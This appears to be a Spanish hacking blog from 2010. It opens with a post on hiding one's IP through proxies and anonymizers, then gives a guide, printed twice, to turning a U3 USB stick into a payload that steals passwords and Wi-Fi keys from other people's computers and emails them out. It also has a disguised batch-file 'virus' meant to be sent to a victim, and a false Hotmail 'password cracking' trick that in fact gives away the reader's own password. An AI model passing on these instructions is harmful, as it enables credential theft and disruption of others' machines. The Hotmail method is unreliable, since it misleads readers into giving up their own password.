Como Esconder tu IP
Para empezar, te recomiendo buscar textos sobre wingates, socks y proxies (además, dehabilitá el java, javascript, cookies, links relacionados y actualización automática ... y tené en cuenta que si pretendés ocultar tu identidad, Internet Explorer no es la mejor opción). Intenta también instalar un firewall o DHCP...
Hay situaciones en las cuales queremos visitar un site sin dejar rastros en él, puede que tengas ganas de espiar el site de la competencia. Tu visita quedará registrada en un archivo LOG del servidor. Los visitantes frecuentes generan muchos registros.
Estos registros pueden brindar información al administrador de la red, información que es enviada desde nuestra PC sin que nos enteremos.
Sin embargo, para que el servidor guarde estos datos no necesita hacer pruebas demasiado sofisticadas. Un "snooper" dedicado podría averiguar mucho más. Ha habido algunos casos de sitios que han intentado acceder al disco rígido del visitante (un caso un tanto extremo). También hay miles de casos que involucran cookies (http://www.illuminatus.com/cookie.fcgi), código javascript y applets java malintencionados, agujeros de seguridad en los navegadores, etc, así que la mejor opción es navegar con un intermediario que entre a los sitios por nosotros.
Paso 1 - Determinar tu dirección IP:
Para averiguar tu propia dirección IP andá a http://megawx.aws.com/support/faq/software/ip.asp
Cada computadora conectada a Internet tiene un número identificador único llamado "dirección IP". En la mayoría de las redes la dirección IP de una PC es siempre la misma. En algunas otras, ésta se asigna cada vez que la PC se conecta a la red. A eso me refiero cuando pregunto si tenés dirección estática o dinámica. Si tu IP es dinámica seguro que será distinta cada vez que te conectes.
Hay una explicación muy completa sobre números IP (qué son y cómo funcionan) AQUÍ
Paso 2 - Lograr navegar anonimamente:
Método 1: Anonymizer
Cualquiera puede navegar anonimamente con la ayuda de un excelente servicio llamado "Anonymizer x" (http://www.anonymizer.com/3.0/index.shtml). Visitalo y escribí allí el URL que querés ver anónimamente ("Anonymizer" hace todo el trabajo por vos, eliminando varios peligros potenciales). Cuando seguís un link que hay en una página a la que entraste via Anonimyzer, el mismo se abre también via Anonymizer, de modo que no tengas que tipear a mano todas las direcciones a las que quieras ir. Este sitio te da la opción de pagar el servicio o usarlo gratis, pero si lo usamos gratis nos encontraremos con una serie de limitaciones, tales como una demora de 30 segundos en la descarga de la página, y acceso anónimo sólo a sitios con protocolo HTTP (no HTTPS ni FTP). Por otra parte, existen sitios que son inaccesibles a través de Anonymizer, como ser algunos servidores de e-mail por web.
Otro servicio que nos puede prestar Anonymizer es el de "acercarnos" las páginas web lejanas, por ejemplo, si una página está ubicada en Japón y algún problema de enlace no nos permite conectarnos rápidamente (es decir: no la podemos ver), podemos pedirle a Anonymizer que entre a ella por nosotros y nos la muestre luego. Probablemente Anonymizer tenga un mejor enlace con Japón que el que tenemos nosotros, y esto nos solucionaría el problema. Por último, hay algunos sitios que nos muestran distinta información de acuerdo al lugar geográfico desde el cual entremos. Por ejemplo: El sitio de la Enciclopedia Británica (en la sección dedicada a "enviar el pedido de compra") ofrece un listado de representantes en cada país, pero al entrar a través de Anonymizer aparece en su lugar otra página en la cual podemos ver los precios que tienen en USA (hogar de Anonymizer). No es dificil imaginar que los precios de los representantes son varias veces mayores que los precios en USA.
Anonymizer es una de las herramientas más populares para navegar anonimamente, pero no es la única. Continuamente aparecen sitios que ofrecen servicios similares. Una buena alternativa es JANUS (http://www.rewebber.de/) ubicado en Alemania. Es rápido, puede encriptar el URL, y además es gratuito. Lo siguiente es un fragmento de las aclaraciones que hay en el sitio de JANUS:
"JANUS es capaz de encriptar los URLs (las direcciones de las páginas) de modo que puedan ser usadas como referencia al servidor. Si se da el caso en que una dirección encriptada sea solicitada, JANUS podrá desencriptarla y reenviarla al servidor, sin necesidad de que el usuario sepa cuál es la verdadera dirección. Todas las referencias en la respuesta del servidor son encriptadas también, antes de que lleguen al usuario." (una variante muy interesante al servicio de anonimato... anonimato para servidores!)
Metodo 2: Servidores Proxy
También es posible lograr el anonimato en la navegación interponiendo un servidor proxy. Este servicio es similar al de Anonymizer, ya que las páginas son solicitadas por el proxy en lugar de la persona que realmente está navegando. Pero hay algunas diferencias muy importantes: los proxies no filtran los cookies, applets ni código malintencionados. En definitiva, lo único que hacen es ocultar nuestra posición geográfica.
Casi todos los servidores proxy tienen el acceso restringido a los usuarios del proveedor en el cual se encuentra, es decir... si usamos Fibertel no podremos utilizar el proxy de Sinectis (el acceso será denegado). Por suerte, siempre hay por allí algún proxy generoso que ofrece sus servicios al público en general, intencionalmente o debido a un error en la configuración (claro que los motivos suelen no ser públicos).
Cómo podemos encontrar estos Proxies "generosos"? Buena noticia para los perezosos: hay muchas listas de servidores proxy públicos, sin ir más lejos: http://tools.rosinstrument.com/cgi-bin/dored/cgi-bin/fp.pl/showlog
Para quienes no son tan perezosos: encuentren sus propios servidores proxy, es fácil. Vayan a Altavista (www.altavista.com) y escriban algo como +proxy +server +configuration +port, y van a recibir la lista de páginas web en las que los proveedores de Internet dan instrucciones completas a sus usuarios sobre cómo configurar sus navegadores para usar sus proxies. Prueben con cada proxy que hayan encontrado, y luego de 6 o 7 fallas (servicios "restringidos") encontrarán seguramente uno que ande. Suponiendo que hayan encontrado uno, digamos cualquier.proxy.com, HTTP port 8080. Para hacerlo funcionar en tu conección tenés que llenar (en tu navegador) los datos en la sección "Configuración manual de servidor proxy".
Configurando:
En Netscape Communicator:
Editar - Preferencias - Avanzado - Proxies - Configuración manual de proxy - Ver, y para HTTP y FTP escribí el nombre de tu servidor (ejemplo: proxy.datafull.com) y número de port (ejemplo 3128).
En Internet Explorer 4.0:
Ver - Opciones de Internet - Conexiones - marcar "Acceder a Internet usando un servidor proxy". Donde dice DIRECCIÓN escribir el nombre (ejemplo: proxy.datafull.com) y en PORT escribir el número de puerto (ejemplo: 3128), hacer click en opciones avanzadas y marcar donde dice "Usar el mismo proxy para todos los protocolos".
Una vez hecho todo esto ya podés empezar a navegar dejando el rastro de que estás en Bulgaria, USA, Corea del Norte o donde quiera que se encuentre el proxy, pero ...aún hay un tema importante a tener en cuenta, "¿Mi proxy... es realmente anónimo?"
¿Mi proxy es realmente anónimo?
No todos los proxies son del todo anónimos. Algunos de ellos dejan que el administrador del sistema (del sitio visitado) averigüe la dirección IP desde la cual nos estamos conectando al proxy, o sea, nuestra dirección IP real. Una vez que estés usando un proxy vas a poder hacerle una prueba de anonimato en la siguiente dirección: http://www.tamos.com/bin/proxy.cgi
Si recibís el mensaje "Proxy server is detected!" - entonces hay un agujero de seguridad en el proxy que estás usando, y los servidores web es capaz de averigüar tu verdadero IP. La información sobre tu verdadero IP va a aparecer en la página web. Si el mensaje que recibís es "Proxy server not detected" - significa que estás navegando anónimamente. De todos modos recomiendo estudiar cuidadosamente la lista de direcciones IP que esa página nos devuelva. Ninguno de ellos debería ser el tuyo. También podés realizar otras pruebas para ver si tu navegador es anónimo. Dichas pruebas pueden darte una lista completa de parametros que tu navegador deja saber al sitio web que visitas. (esa información está contenida en las llamadas "variables de entorno"). Proxys-4-All (http://proxys4all.cgi.net/tools.html) siempre tiene una larga lista de testeadores para esto.
Consideraciones Finales:
A pesar de todo lo dicho anteriormente ... usá proxies sólo cuando sea necesario. Navegar a través de proxies reduce considerablemente la velocidad de la transferencia de datos. Otra consideración importante que la gente suele olvidar: usá los proxies para propositos legales. Esconder tu identidad es aceptable si no querés que los servidores recopilen datos sobre vos, pero si ocultas tu IP para comprar CD´s, libros o software con una tarjeta de crédito falsa hay una buena posibilidad de que termines en la carcel, eso sin contar los aspectos morales. No te olvides de que todas las conexiones son logeadas, y si violaste una ley podrías ser rastreado, al menos en los países en los cuales la ley actúa en serio. El adminstrador del sitio podría leer los registros y contactar al administrador del proxy, y este último leería los suyos y averiguaría tu IP verdadero, entonces ambos contactarían a tu proveedor de Internet y ya tendrían tu nombre y dirección, y si usaste una cuenta que no es tuya, al menos tendrían el teléfono desde el cual llamaste... espero que haya quedado claro.
Especial para paranoicos:
Esto es interesante: Las herramientas que vimos hasta ahora pueden ser encadenadas!
Por ejemplo, si estás usando el Proxy A, y sabés las direcciones de otros dos proxies (Proxy B y Proxy C). La dirección que deberías solicitar sería algo así como http://proxyB:puerto/http://proxyC:puerto/http://www.lapagina.com ... Como resultado, accederías a www.lapagina.com a través de 3 proxies anónimos: A (que está configurado en el browser) B y C (que están en el url que escribiste).
Otro ejemplo más realista podría ser: http://proxy.usnowear.com:8080/http://proxy.barcelonaweb.com:8080/http://www.datafull.com
Cuidado: No todos los proxies permiten ese tipo de encadenado.
SocksCap - para usar anónimamente aplicaciones que no sean HTTP (telnet, ftp, ICQ, RealPlayer, etc)
Qué es SocksCap?
SocksCap permite que las aplicaciones clientes basadas en TCP y UDP pasen a través de un firewall ubicado en un servidor del tipo SOCKETS. SocksCap intercepta las llamadas hechas a la red desde aplicaciones WinSock y las redirige a través de un server SOCKS de manera transparente para las aplicaciones o el sistema operativo y drivers.
Cuál es la última versión?
La versión actual de SocksCap16 (16-bit) es la 1.02. La versión más reciente de SocksCap32 (32-bit) es la 1.03. También existe una versión beta de SocksCap32 Version 2 (Beta 3).
Cuál es la diferencia entre SocksCap, SocksCap16, y SocksCap32?
El número se refiere a las versiones de 16 y 32 bits. SocksCap16 es la version de 16-bits. SocksCap32 es la de 32-bits.
Necesito SocksCap16, SocksCap32, o los dos?
Para Windows 3.1 y Windows para trabajo en grupo 3.11 necesitás SocksCap16.
Para Windows 95 y Windows 98 necesitás SocksCap32 para las aplicaciones de 32-bits. Si además estás ejecutando alguna aplicación de 16 bits (algún programa viejo quizás) bajo Windows 95 o 98, necesitás SocksCap16 para esas aplicaciones. Es posible ejecutar SocksCap16 y SocksCap32 a la vez para manejar todas las aplicaciones (de 16 y 32 bits).
En Windows NT o 2000, usá SocksCap32. (Estos sistemas operativos no permiten software de 16 bits.
Dónde puedo conseguir SocksCap?
SocksCap está disponible para descarga en el sitio web de SOCKS en: http://www.socks.nec.com/.
SocksCap es gratis? Y el codigo fuente, está disponible?
El programa se puede bajar gratis del sitio web de SOCKS. No está librado al dominio público. Su uso y distribución está restringido y sujeto a ciertos acuerdos. El código fuente no está disponible.
Funciona con todas las aplicaciones?
SocksCap funciona independentemente de las aplicaciones que usemos, pero puede presentar algunos problemas en ciertos casos.
Cómo sé si funciona con mi aplicación?
La mejor manera de saber eso es probarlo. Podrías referirte a la tabla de aplicaciones con las cuales los usuarios han reportado éxito o fracaso. Bajate la lista de la sección SocksCap del sitio http://www.socks.nec.com/.
Es necesario que use el FTP en modo de transferencia pasiva?
FTP puede experimentar dificultades, dependiendo de la aplicación y el stack. Intenta sin el modo pasivo, si no anda, intenta con el pasivo.
Cómo se configuran el servidor de SOCKS y el puerto en el setup de SocksCap?
Escribe la dirección y puerto del servidor SOCKS que querés atravezar. Si no estás seguro de lo que eso quiere decir, contacta a tu ISP o administrador de red o firewall o consulta una lista en: http://tools.rosinstrument.com/proxy/1080.htm.
sábado, 20 de marzo de 2010
miércoles, 17 de marzo de 2010
Sacale uso a tu pendrive
Hoy os enseño a combretir vuestra llave en una herramienta "hack"
Espero que os guste
Convierte tu U3 USB Smart en una poderosa herramienta hacking La ejecución automática de la U3 podría usarse con fines diversos al almacenamiento de información en la misma, decidí buscar en Internet y afirmativament e servía como una herramienta hacking.
La U3 junto a un software especial instalado es capaz de sacar las contraseñas de un PC, sea del Internet Explorer, FireFox, Outlook, entre otros. También la información de conexión, el modem, password del wi-fi, hasta el historial de navegación del IE o FF.
Si tienes una SanDisk U3, aquí tienes cómo instalarlo:
Cómo se instala?
1. Descarga GonZor=- Payload V2.0 2.
2. Descarga Universal Customizer
3. Descomprime el Universal Customizen en C:\Universal_Customizer.
4. Descomprime el -=GonZor=- Payload V2.0 en C:\Payload.
5. Copia el archivo U3CUSTOM.ISO de C:\Payload y pégalo en C:\Universal_Customizer\BIN reemplazando el antiguo.
6. Ejecuta C:\Universal_Customizer\Universal_Customizer.exe y conecta tu memoria al PC.
- Selecciona Accept y dale clic en Next.
- Cierra cualquier aplicación U3 o cualquier programa que tenga acceso a esta.
- Selecciona un password para hacer un backup de tu información de la memoria (la va a formatear).
- Clic en Next y empezará a grabar tu infomación de la memoria al disco duro, espera a que la memoria U3 culmine su trabajo. - Ya todo debe estar completo, desconecta tu memoria y conéctala de nuevo.
7. Copia C:\Payload\SBconfig.exe en tu memoria USB U3.
8. Ejecuta SBconfig.exe desde tu memoria.
- Selecciona las opciones de la izquierda que te gustaría usar, recomiendo habilitar todas.
- Crea una cuenta de GMAIL nueva para usar el HackSaw.
- Cliquea en Update Config para actualizar tu configuración, debe aparecer un mensaje de confirmación.
- Para habilitar o deshabilitar el software haz clic en Turn U3 Launchpad On y Off respectivament e.
9. Ahora debes tener instalado -=GonZor=- en tu U3!
Podrás sacar passwords de cualquier equipo Windows XP o Vista sólo si está en modo Administrador.
Te recomiendo una vez finalices estos pasos y actives el software, no vuelvas a meter la memoria en tu equipo, de lo contrario quedará instalado HackSaw en tu PC y enviará toda la información de tu memoria al correo que usaste anteriormente, robándote mucho ancho de banda.
Cada vez que pongas la memoria en algún equipo asegúrate de deshabilitar el Launchpad (Turn Launchpad Off), para que puedas meterlo en tu equipo.
Los logs (contraseñas, historiales, datos.) quedarán guardados en tu memoria U3 Smart exactamente en: %pendrive%:\System\Logs\%NOMBRE_DEL_PC_HACKEADO%
siendo %pendrive%: la letra de unidad de tu memoria.
y esto es tod hasta otra
Espero que os guste
Convierte tu U3 USB Smart en una poderosa herramienta hacking La ejecución automática de la U3 podría usarse con fines diversos al almacenamiento de información en la misma, decidí buscar en Internet y afirmativament e servía como una herramienta hacking.
La U3 junto a un software especial instalado es capaz de sacar las contraseñas de un PC, sea del Internet Explorer, FireFox, Outlook, entre otros. También la información de conexión, el modem, password del wi-fi, hasta el historial de navegación del IE o FF.
Si tienes una SanDisk U3, aquí tienes cómo instalarlo:
Cómo se instala?
1. Descarga GonZor=- Payload V2.0 2.
2. Descarga Universal Customizer
3. Descomprime el Universal Customizen en C:\Universal_Customizer.
4. Descomprime el -=GonZor=- Payload V2.0 en C:\Payload.
5. Copia el archivo U3CUSTOM.ISO de C:\Payload y pégalo en C:\Universal_Customizer\BIN reemplazando el antiguo.
6. Ejecuta C:\Universal_Customizer\Universal_Customizer.exe y conecta tu memoria al PC.
- Selecciona Accept y dale clic en Next.
- Cierra cualquier aplicación U3 o cualquier programa que tenga acceso a esta.
- Selecciona un password para hacer un backup de tu información de la memoria (la va a formatear).
- Clic en Next y empezará a grabar tu infomación de la memoria al disco duro, espera a que la memoria U3 culmine su trabajo. - Ya todo debe estar completo, desconecta tu memoria y conéctala de nuevo.
7. Copia C:\Payload\SBconfig.exe en tu memoria USB U3.
8. Ejecuta SBconfig.exe desde tu memoria.
- Selecciona las opciones de la izquierda que te gustaría usar, recomiendo habilitar todas.
- Crea una cuenta de GMAIL nueva para usar el HackSaw.
- Cliquea en Update Config para actualizar tu configuración, debe aparecer un mensaje de confirmación.
- Para habilitar o deshabilitar el software haz clic en Turn U3 Launchpad On y Off respectivament e.
9. Ahora debes tener instalado -=GonZor=- en tu U3!
Podrás sacar passwords de cualquier equipo Windows XP o Vista sólo si está en modo Administrador.
Te recomiendo una vez finalices estos pasos y actives el software, no vuelvas a meter la memoria en tu equipo, de lo contrario quedará instalado HackSaw en tu PC y enviará toda la información de tu memoria al correo que usaste anteriormente, robándote mucho ancho de banda.
Cada vez que pongas la memoria en algún equipo asegúrate de deshabilitar el Launchpad (Turn Launchpad Off), para que puedas meterlo en tu equipo.
Los logs (contraseñas, historiales, datos.) quedarán guardados en tu memoria U3 Smart exactamente en: %pendrive%:\System\Logs\%NOMBRE_DEL_PC_HACKEADO%
siendo %pendrive%: la letra de unidad de tu memoria.
y esto es tod hasta otra
lunes, 15 de marzo de 2010
Como crear un inocente virus informatico
Hoy como me sinto esplendido os dire como crear un inocente virus informatico
Crear tu propio Virus
En este minitutorial aprenderás como crear tú propio virus, aunque más que un virus es una broma pesada, en la que tu victima deberá reiniciar su ordenador si quiere librarse de él.
Simplemente sigue los pasos que te pongo a continuación y listo, fácilmente tendrás tu propio virus preparado para operar. Esta pequeña aplicación la crear en Wordpad o tu bloc de notas.
1. Abre el bloc de notas
2. Escribe el siguiente código:
@echo off
:a
start
start
start
start
start
start
goto :a
3. Vete a archivo -> guardar como: Mi PC.bat , esto es el nombre del archivo, lo puedes llamar como quieras pero que termine en .bat. En tipo has de seleccionar todos los archivos
4. Puedes cambiar el icono por otro que te guste, por ejemplo por el de Mi PC, de esta manera pasará desapercibido.
5. Ya se lo puedes enviar a tu victima.
Es un virus inofensivo, lo que hace el script, es abrir CMD seis veces continuamente y no tienes manera de detenerlo, simplemente reinicia el ordenador y el problema estará solucionado. Lo podemos considerar un truco del bloc de notas.
Este truco tiene carácter educacional, úsalo bajo tu propia responsabilidad.
Hasta otra amigos
MSN SIN SECRETOS
Hoy como todas estas ultimas semanas os dire como hackear otro elemento mas, hoy le toca al msn. (como descifrar la clave de msn ajeno) es sistema es el siguiente pero hay muchas mas formas que ya os contare:
CONTRASEÑAS DE HOTMAIL AL DESCUBIERTO
Para hackear el passwords (encontrar la contraseña de alguien que nos interese) sólo debemos acceder a este banco de datos valiéndonos precisamente de su sistema automático de verificación de passwords.
¿Qué se necesita?
Que tengas tu mismo/a una cuenta de Hotmail o LatinMail propia abierta
¿Cuál es el procedimiento?
Paso 1.
Entra en tu cuenta de hotmail o latinmail.
Paso 2.
Debes redactar un mensaje con las siguientes características:
En el campo "To" ( o "para") debes escribir la dirección del sistema que contiene la base de datos sobre la cual se realiza la verificación de passwords.
Para hotmail
"To":login_keypassword@hotmail.com
Paso 3.
En el campo "Subjet" ( Asunto) debes escribir lo siguiente: retrieve password.
Paso 4.
En el cuerpo del mensaje debes escribir exactamente el siguiente código:
form_login= ESCRIBE AQUÍ EL CORREO DE TU VICTIMA(ej: 123456@hotmail.com )
form_login.gets=?; form.passwd.gets=?;
sendto=ESCRIBE AQUÍ TU CORREO; form.passwd=ESCRIBE AQUÍ TU PASSWORD
form_value= "adm".login_keypassword@hotmail.com
Ahora envia el mensaje. Si tienes correo hotmail, el correo se envia automaticamente , y en 20 segundos tendras la clave deseada.
recuerdo, que esto no debe utilizarse con fines maléficos. unicamente como cultura general
y esto es todo asta la prosima publicación
Suscribirse a:
Entradas (Atom)
Entradas
